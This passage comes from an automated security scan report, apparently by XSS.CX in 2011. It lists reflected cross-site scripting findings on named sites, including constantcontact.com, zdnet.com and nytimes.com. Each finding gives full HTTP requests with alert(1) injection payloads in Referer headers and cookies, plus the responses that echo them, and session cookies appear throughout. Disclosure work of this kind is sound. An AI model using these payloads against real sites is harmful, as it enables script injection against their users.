Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:23 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/web?a74e0<script>alert(1)</script>1505dae608c=1</h2>
...[SNIP]...

1.132. http://www.constantcontact.com/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.constantcontact.com
Path:	/index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69bd0'-alert(1)-'3935c2645ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.jsp HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages; cclp_partner="prt_01_ts=21765467|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=cc::CLK_14302119028162790|cc_01_ts=21765467|"; cclp_content="lp_uid=20110520_17:47:29.427_D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages|"; cclp_referral="partner=ROVING|cc=CLK_14302119028162790|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; BIGipServerProdLP=2235962378.20480.0000
Referer: http://www.google.com/search?hl=en&q=69bd0'-alert(1)-'3935c2645ac

Response

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 21:48:03 GMT
Server: Apache
X-Powered-By:
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
ETag: "0592f5f18c1e33e215e5720c86b937831"
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 32766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email Marketi
...[SNIP]...
<![CDATA[
s.pageName='/index.jsp';
s.server='533';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=69bd0'-alert(1)-'3935c2645ac';
s.campaign='CLK_14302119028162790';
s.prop1='';
s.prop2='20110520_17:47:29.427_D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages';
s.prop3='prospect';
s.prop4='ROVING';
s.prop5='';
s.prop6='Websi
...[SNIP]...

1.133. http://www.constantcontact.com/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.constantcontact.com
Path:	/index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e50'-alert(1)-'cf879ce3d21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.jsp?cc=CLK_14302119028162790 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=d3e50'-alert(1)-'cf879ce3d21

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 21:48:18 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=FDA51161E6D7A8B3FFCB270515748912.worker_landingPages; Path=/
Set-Cookie: cclp_partner="prt_01_ts=21765468|prt_01=partner.name::NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=cc::googd3e50-alert(1)-cf879ce3d21|cc_01_ts=21765468|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20110520_17:48:18.775_FDA51161E6D7A8B3FFCB270515748912.worker_landingPages|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_nsearch="ns_01_ts=21765468|ns_01=goog::d3e50-alert(1)-cf879ce3d21|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_referral="partner=NATSEARCH|pn=NATSEARCH|cc=googd3e50-alert(1)-cf8|sitereferrer=http://www.google.com/search?hl=en&q=d3e50-alert(1)-cf879ce3d21|partner.name=NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Set-Cookie: cclp_partner="prt_01_ts=21765468|prt_01=partner.name::NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=cc::googd3e50-alert(1)-cf879ce3d21|cc_01_ts=21765468|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20110520_17:48:18.775_FDA51161E6D7A8B3FFCB270515748912.worker_landingPages|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_nsearch="ns_01_ts=21765468|ns_01=goog::d3e50-alert(1)-cf879ce3d21|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_referral="partner=NATSEARCH|pn=NATSEARCH|cc=googd3e50-alert(1)-cf8|sitereferrer=http://www.google.com/search?hl=en&q=d3e50-alert(1)-cf879ce3d21|partner.name=NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
ETag: "08284ec42a4d26daf78874e695e6563ef"
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerProdLP=2252739594.20480.0000; path=/
Content-Length: 32605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email Marketi
...[SNIP]...
<![CDATA[
s.pageName='/index.jsp';
s.server='534';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=d3e50'-alert(1)-'cf879ce3d21';
s.campaign='googd3e50-alert(1)-cf8';
s.prop1='';
s.prop2='20110520_17:48:18.775_FDA51161E6D7A8B3FFCB270515748912.worker_landingPages';
s.prop3='prospect';
s.prop4='NATSEARCH';
s.prop5='';
s.prop6='W
...[SNIP]...

1.134. https://www.constantcontact.com/evm_fee_schedule.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.constantcontact.com
Path:	/evm_fee_schedule.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c916'-alert(1)-'0477972a2ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /evm_fee_schedule.jsp HTTP/1.1
Host: www.constantcontact.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6c916'-alert(1)-'0477972a2ae
Cookie: BIGipServerProdLP=2219185162.20480.0000; mbox=session#1305929363704-637390#1305931335|PC#1305929363704-637390.17#1313705475|check#true#1305929535; GNA_STATE=0; JSESSIONID=A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages; cclp_content="lp_uid=20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages|"; cclp_partner="prt_01_ts=21765489|prt_01=partner.name::ROVING|"; cclp_referral="partner=ROVING|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; s_cc=true; gpv_p11=/offer/buynow/yourweek/signup.jsp; s_sq=constantcom%3D%2526pid%253D/offer/buynow/yourweek/signup.jsp%2526pidt%253D1%2526oid%253Dhttps%25253A//www.constantcontact.com/evm_fee_schedule.jsp%252523evm_pricing_overlay%2526ot%253DA; __utma=152702054.1621908348.1305929445.1305929445.1305929445.1; __utmb=152702054; __utmc=152702054; __utmz=152702054.1305929445.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; cclp_txn="txn_03=page_view::caro_amex|txn_02=page_view::caro_amex|txn_03_ts=21765490|txn_01=page_view::caro_amex|txn_02_ts=21765490|txn_01_ts=21765490|"

Response

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 22:12:31 GMT
Server: Apache
X-Powered-By:
Cache-Control: max-age=0, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Expires: Fri, 20 May 2011 22:12:31 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 11729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Event Marketi
...[SNIP]...
<![CDATA[
s.pageName='/evm_fee_schedule.jsp';
s.server='532';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=6c916'-alert(1)-'0477972a2ae';
s.campaign='';
s.prop1='';
s.prop2='20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages';
s.prop3='prospect';
s.prop4='ROVING';
s.prop5='';
s.prop6='Website';
s.prop7='';
s.pr
...[SNIP]...

1.135. https://www.constantcontact.com/offer/buynow/yourweek/signup.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.constantcontact.com
Path:	/offer/buynow/yourweek/signup.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd367'-alert(1)-'f5938e241ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /offer/buynow/yourweek/signup.jsp HTTP/1.1
Host: www.constantcontact.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fd367'-alert(1)-'f5938e241ee
Cookie: BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1305929424|session#1305929363704-637390#1305931224|PC#1305929363704-637390.17#1313705368; GNA_STATE=0; JSESSIONID=A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages; cclp_content="lp_uid=20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages|"; cclp_partner="prt_01_ts=21765489|prt_01=partner.name::ROVING|"; cclp_referral="partner=ROVING|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; s_cc=true; gpv_p11=/index.jsp; s_sq=constantcom%3D%2526pid%253D/index.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A//www.constantcontact.com/txn/set.jsp%25253Fid%25253Dcaro_amex%2526ot%253DA; __utma=152702054.1621908348.1305929445.1305929445.1305929445.1; __utmb=152702054; __utmc=152702054; __utmz=152702054.1305929445.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; cclp_txn="txn_03=page_view::caro_amex|txn_02=page_view::caro_amex|txn_03_ts=21765490|txn_01=page_view::caro_amex|txn_02_ts=21765490|txn_01_ts=21765490|"

Response

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 22:12:26 GMT
Server: Apache
X-Powered-By:
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
ETag: "030130a6d5bb4dffee3d8ae13b0a81828"
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 66670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Buy Now and g
...[SNIP]...
<![CDATA[
s.pageName='/offer/buynow/yourweek/signup.jsp';
s.server='532';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=fd367'-alert(1)-'f5938e241ee';
s.campaign='';
s.prop1='';
s.prop2='20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages';
s.prop3='prospect';
s.prop4='ROVING';
s.prop5='';
s.prop6='Website';
s.prop7='';
s.pr
...[SNIP]...

1.136. http://www.zdnet.com/blog/btl [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.zdnet.com
Path:	/blog/btl

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e34"><a>70686ffbfd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/btl HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 89e34"><a>70686ffbfd6

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:36:27 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Sun, 20-May-2012 12:36:27 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 99907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
adlog/i/r=9953&sg=1815&o=6037%253A10532%253A&h=cn&p=&b=2&l=&site=2&pt=2001&nd=10532&pid=&cid=0&pp=100&e=&rqid=00c17-ad-e3:4DD74246598B28&orh=89e34"><a>70686ffbfd6&ort=&oepartner=&epartner=&ppartner=&pdom=89e34">
...[SNIP]...

1.137. http://www.nytimes.com/recommendations/svc/personalized.json [RMID cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/recommendations/svc/personalized.json

Issue detail

The value of the RMID cookie is copied into the HTML document as plain text between tags. The payload 4ea42<img%20src%3da%20onerror%3dalert(1)>864a8deee8d was submitted in the RMID cookie. This input was echoed as 4ea42<img src=a onerror=alert(1)>864a8deee8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /recommendations/svc/personalized.json?hp=1 HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=0bd8082a282c4dd7b0f4b6204ea42<img%20src%3da%20onerror%3dalert(1)>864a8deee8d; adxcs=s*25381=0:1; nyt-m=648767966DF164CA18040FD9053D91B2&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305981179&vr=l.4.0.0.0.0&pr=l.4.1.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 21 May 2011 12:33:58 GMT
Content-Type: application/json
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 201

{"num_articles":null,"user_pic_url":null,"user_displayname":null,"using_rmid_suggestions":true,"suggestions":[],"uid":null,"rmid":"0bd8082a282c4dd7b0f4b6204ea42<img src=a onerror=alert(1)>864a8deee8d"}

Report generated by XSS.CX at Sat May 21 08:17:05 CDT 2011.